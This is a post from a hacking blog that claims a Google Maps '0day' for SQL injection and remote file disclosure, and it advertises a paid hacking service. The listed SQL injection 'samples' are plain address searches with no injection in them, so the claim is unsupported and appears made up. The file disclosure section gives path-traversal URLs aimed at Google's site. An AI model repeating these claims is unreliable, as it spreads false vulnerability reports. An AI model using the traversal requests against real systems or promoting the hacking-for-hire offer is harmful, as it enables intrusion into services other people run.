Welcome to My Blog KYXRECON Plus+ , My blog is database of Tool's Hacking & all stuff security things & great recource for beginner's & professionals too . . our admins aim collecting exploit's & tools and posting hacking security tutorials & concentrate them in one easy navigate on this database This site written by Kyxrecon .Use it at your own risk. And i am not responsible for any damage /// My Hacking Service Price List -> pastebin.com/raw/3kTqdK0T
[!] tor blog is down -> http://kyxroj5ziov3ic7.onion

Google Maps Remote File Disclosure / SQL Injection


==> ABOUT ME:
--- KYXRECON
--- INDEPENDENT SECURITY RESEARCHER


===> INFO:
Author        : KYXRECON
Category      : Webapps / 0day
Title Exploit : Google Maps - Remote File Disclosure /SQL Injection Vulnerability
Vendor        : Google Maps
URL Vendor    : http://maps.google.com/

++++++++++++++++++++++++++++++++++++

Proof of CONCEPT IMAGES :

http://img256.imageshack.us/img256/5621/googlemapsr.jpg

http://img341.imageshack.us/img341/995/googlemaps2i.jpg

++++++++++++++++++++++++++++++++++++


==> SAMPLE'S SQLi:
http://maps.google.com/maps?q=1001%20+longwod+%20road+%2019348 [SQL Injection]
http://maps.google.com/maps?q=1001%20+Webb%20+Rd+%20Chadds%20+Ford+%20Delaware+%20Pennsylvania+%2019317 [SQL Injection]
http://maps.google.com/maps?q=1001%20+Webb%20+Rd+%20Wolverine+%20Cheboygan+%20Michigan+%2049799 [SQL Injection]
http://maps.google.com/maps?q=1001%20+Webb%20+Rd+%20Crum+%20Wayne+%20West+%20Virginia+%2025669 [SQL Injection]
http://maps.google.com/maps?q=1001%20+Webb%20+Rd+%20Simpsonville+%20Shelby+%20Kentucky+%2040067 [SQL Injection]
http://maps.google.com/maps?q=1001%20+Webb%20+Rd+%20Cottage+%20Grove+%20Weakley+%20Tennessee+%2038224 [SQL Injection]
http://maps.google.com/maps?q=1001%20+Webb%20+Rd+%20Dothan+%20Houston+%20Alabama+%2036303 [SQL Injection]
http://maps.google.com/maps?q=1001%20+Webb%20+Rd+%20Clarksville+%20Montgomery+%20Tennessee+%2037040 [SQL Injection]
http://maps.google.com/maps?q=1001%20+Webb%20+Rd+%20Chattanooga+%20Hamilton+%20Tennessee+%2037416 [SQL Injection]
http://maps.google.com/maps?q=1001%20+Webb%20+Rd+%20Ellenboro+%20Rutherford+%20North+%20Carolina+%2028040 [SQL Injection]

==>REMOTE FILE DISCLOSURE

http://maps.google.com/ads/displaynetwork/adtypes/xxxxx/../../../../maps/ms

----------------------------------------------------------------------------

http://maps.google.com/ads/displaynetwork/adtypes/hilton-300x250.html/../../../../maps/ms
http://maps.google.com/ads/displaynetwork/adtypes/lenovo-728x90.html/../../../../maps/ms


Posted by Unknown at 10:39:00 AM  

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)

CHATBOX



Cont@ct

Name

Email *

Message *